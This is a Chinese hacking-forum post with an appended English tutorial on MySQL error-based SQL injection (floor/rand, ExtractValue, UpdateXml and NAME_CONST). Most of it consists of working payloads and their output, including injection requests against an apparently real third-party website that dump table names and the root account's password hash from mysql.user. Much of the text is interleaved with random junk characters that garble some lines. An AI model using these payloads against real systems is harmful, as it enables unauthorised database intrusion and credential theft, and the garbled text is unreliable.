中国网络渗透测试联盟
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin 时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
; g3 g9 c9 P% M6 h5 P2 X首先进行正常查询:
mysql> select * from article where id = 1;
; }0 c$ E+ I3 F4 @! E+—-+——-+———+
- V; z" B9 R4 l4 k0 m* i: d5 E| id | title | content |# I" d- d9 _9 L
+—-+——-+———+9 a+ T5 H* Y9 x V9 k
| 1 | test | do it |
& p6 N% g! \, }0 X/ t; O+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
- v! f! K7 q( B; O* G5 ]ERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。$ G7 t! Q# Y1 `8 t6 g
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);2 Q, ^' t9 R; t# ]; ?: w
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
& A9 S6 ?/ J$ ]1 A uERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
2、ExtractValue; O1 r% s$ z" V) \% b# ` G& Q9 m
测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
7 } `* L0 v. ~5 j2 @8 `ERROR 1105 (HY000): XPATH syntax error: ’\admin888′
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
: z4 K& S* d8 P. N8 ~. ?; J' W, g* Y
" _) I2 C% _ J$ K( g8 i0 T再收集:
# g( }7 ?; p" ^) ~2 @4 x
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ! k2 ?9 s9 ]* G) f
+ \8 l* V/ b0 q! i# u6 G$ `Error
uplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
/ n I/ U, ]4 X- _8 ^
3 m$ R8 d# h/ nhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
5 F+ V- z0 E; f! F! U1 P
9 ^2 `2 b& i z" I) w6 F4 Y3 KErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
! z3 v$ g) j" G5 ]$ p# b% ^- `
" [ ?1 F" f6 t( X. {/ }$ GMYSQL高版本报错注入技巧-利用NAME_CONST注入( F( m+ ?" W) x/ K! I1 ~; ~; w
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
. a. t/ n# F3 ~, V
4 J' q7 _3 r5 O1 T, o9 b$ o+ n' F
) j: a6 W: h/ _4 n d o6 R; z相关信息
% f, ?& O. c2 G, C) m) p' W5 S) `9 b" q
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
! |8 |) Q3 l0 a( G+ J; ^2 X3 [8 P' s ~3 x' `2 D3 n
Code:$ v: i0 D( I8 G7 y& u$ \, \
NAME_CONST(DATA, VALUE)
! U) _( [8 c+ [# i# `
0 {' l4 b' y% J4 J! V6 o$ B0 MReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants., v0 ?2 S# x3 j) D( F# d6 p' c. _
7 Z0 Q& u8 i t) Y0 M# u! \* E$ c, U8 o9 |SELECT NAME_CONST('TEST', 1)
# v% w/ F( N7 H0 B! D( n% T* ^$ b
, U& r8 P0 f f& [2 F# y+ T$ R5 n( u1 e3 c
( d) j. O8 _9 Q# n|---------------|
0 p$ ? i8 F& q| TEST |! f- h8 }3 R: c" K
| |
7 i2 L) i6 C, X% [6 ?|---------------|
% m+ s. W# B( @5 t! {$ d| 1 |
, u% F& s, h& C1 t1 T0 a) g% N| |- t; |) U9 }2 M( f3 R
|---------------| e3 S# ~% ?9 b1 B9 L
! g9 m: e& j4 L% L6 t6 h" g" V& M
6 p( W: B( @9 Z7 _8 z& r' i, q, F* s) I0 i, H' X% I6 x
e/ `0 J6 q7 L# jhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const! q7 r# Q4 G* X8 [* |6 D
Intro to MySQL Variables( m) K; z G0 z1 L& W4 {1 W
0 }3 e. s) F/ s5 J+ Z8 Y
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.
8 x! {# [8 N7 S- S' Y6 {* W- T4 p4 e4 H1 D
Code:2 r8 `+ ?2 W/ k2 n8 t
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
& p% @& z. B& O# n$ o. ?- @9 S5 M
2 `: O& o0 J) D8 T# G* u; g
" t, W/ c3 K1 w a8 }5 Q1 a1 j' O; P0 F3 F
3 P4 h+ R( q8 U2 I. @
) ~! d* }- l1 K9 ]1 X6 x$ J9 B1 a
Code:
B. H/ f* y$ ]2 B# I3 F) Qand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
5 E f" ^. Q& S, y$ D' q4 X
/ D7 e- h% O6 B
2 J3 x' Z v4 `$ o0 h/ T5 ^& g3 cVAR = Your MySQL variable.
7 a# o$ s9 Y& d: H4 M2 b2 ?5 T8 I! w6 T
MySQL 5.1.3 Server System Variables1 ^7 ~7 m5 o- S: `4 I( {
0 X8 ?& ~3 [) B0 S1 g* p! d0 }
Let's try it out on my site..
) u8 N3 p) Y r5 D
w1 N. m8 d3 |+ I9 q7 I/ b5 Z8 sCode:
) v& c: \; Q2 i; Y# m3 C$ rhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--) ]+ C8 m; O( u# I
: _2 T+ B" q, t7 k# o, F4 [9 {Erroruplicate column name '5.0.27-community-nt'
. T; {1 c" r4 l% g* l! S
5 Z: {5 z' ]; n* ~( {# x6 x9 R; Z7 i% d
' G2 D% t# {$ J# w6 e
; V' D7 P9 \4 ?! J9 U" ]# m8 M) W
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...) @4 x6 X* T6 D3 ?% T2 ?2 v, N" b
3 |+ r* ~) m( m! C$ C y. ^
Data Extraction* p9 `# g7 M9 b4 P9 @4 q
# \- ]* f0 ?, r" `/ ZCode:- }0 D* K5 P' U0 |0 s
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
7 C, s: \: P/ A; p" u# U9 \8 |
3 h( g G7 k7 o/ @5 |& V' f# D: a# E+ P# i ^
We should get a duplicate column 1 error.... P# f& a) C' o( `$ D8 n
7 U6 b; I4 d9 n
Code:
3 n& z7 x6 s6 t+ T7 N5 Ahttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--& V7 K- u/ d7 @* |% T, C# s, t0 N
3 P o1 K y' X6 WErroruplicate column name '1# L [9 c% k2 J$ [
; x. \5 S) A5 o: x) r1 Y9 H- ?/ b, r6 T# m2 D
6 ^0 ~0 M5 @- h0 Z$ I: J( q) \- a
; M& w" a" O8 {* X- h
% W( |3 G7 a1 m" o( o' M6 w& f- d6 Y
Now let's get the tables out this bitch..; e) I: H% `& n% r+ p
3 a) l+ d/ a8 l8 @0 o8 M
Code:, p# {$ `& L4 T J1 }9 X+ v
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
6 x. ]- @ H( Q* ?' k% |* d6 o% B; w1 |0 {
5 u) `2 L6 |3 p: z& iLet's see if it works here, if it does, we can go on and finish the job." L4 `: I& U; m% v9 x. ~6 y
$ T, H- l$ N7 MCode:1 c: Y8 j; A; s. A5 j$ a; @4 ~/ v( g5 I
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--% }) G% V% g& _9 j/ f! N- K
: ]$ V1 Q0 H+ i2 @
O; E6 D" O7 E7 j/ {; o
Erroruplicate column name 'com_admanage7 o5 Q- B4 ]& S4 u
% s' M% u! c/ M' _5 ~0 o
" |1 y- g6 Y- ?# F; L% R+ u& F& Z4 }' ^1 x. B3 I- j+ _
5 {; d4 E! ]0 [4 {6 \8 ?
6 G* l; t6 z! i+ P u' [
8 \1 U( t( X4 h. FNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
5 f1 H9 i: t* W7 j( A' m4 H8 T$ t7 t9 }
Let's get the columns out of the user table..
* h0 V" V' V, J6 y/ ?8 q7 L% g# h5 L1 O) `5 e
Code:
9 ^$ r( ]7 E# [# y# I3 a+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--, ?' {5 `1 Q) V, k- j* G4 i. k/ X
$ c/ l/ {+ c, J/ g0 M$ f" X
2 C( N1 x- r0 b/ }/ t, J z& B
So mine looks like this, and I get the duplicate column name 'Host'.
; u7 D( j6 v$ x
; M4 w4 H6 S) ?0 R8 x3 Z7 S2 B5 CCode:
' F% ]8 b& w) i5 Ohttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
5 R0 h) y. d t2 T, P0 P5 E/ s5 W5 j) G/ |
Erroruplicate column name 'Host'
! b( f- C1 X+ `, J+ c0 l
& \9 F& z+ L& {* Q) V; N
; H" G2 c( k5 ~$ d; V$ }
' r, c2 \) o" |1 l/ Y
F8 |- J. s, M9 \7 o3 A# L; Q( X+ L |% ^6 ~
5 P" D4 C# |- c; D) C- hWoot, time to finish this bitch off.
9 k& r u, h; C0 b& t7 t
3 K; X0 ?. W4 L. PCode:
1 V6 N, H: R1 R7 a# B1 t" P+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--0 a6 i# |0 s8 _3 s* E; p
z' f& ~3 I+ @: p$ W" w* x
; A# p% P" G9 |% vSo mine looks like this...8 X T- P0 ]5 L$ c" n
) @/ G3 k7 Q4 ]1 w. M3 _
Code:
, Y1 H% I0 |7 rhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--5 F5 m- o+ T; C6 J9 c' F5 M9 ?
1 |8 W4 C; m/ I9 k
Erroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
4 K* t5 |! N# v4 G. K+ n7 t
$ p4 F# x9 v0 {& ^% p
6 ~9 x0 L% z/ k9 R9 M! x ' N0 M2 p5 A3 C0 z1 ~2 [- ]
1 c9 x2 t8 b( s9 v+ G# i
; y' O5 v2 R1 Q9 w6 l c9 T0 O& C2 ~# K& D6 c6 H" d/ a
And there we have it, thanks for reading.
' i* L9 W+ o3 W, i; \& t
9 g8 e* t3 E7 B; Q
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) |
Powered by Discuz! X3.2 |